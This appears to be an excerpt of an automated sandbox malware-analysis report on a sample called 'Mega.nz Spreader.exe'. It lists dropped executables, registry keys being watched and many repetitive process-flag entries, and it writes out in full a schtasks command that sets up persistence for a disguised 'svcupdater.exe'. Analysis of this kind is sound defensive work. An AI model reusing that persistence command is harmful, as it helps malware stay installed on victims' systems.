Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	File created: C:\Users\user\AppData\Local\Temp\lib.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	File created: C:\Users\user\AppData\Local\Temp\leaf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\unicodedata.pyd	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\lib.exe

Code function: 5_2_00007FF759952F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00007FF759952F20

Source: C:\Users\user\AppData\Local\Temp\api.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
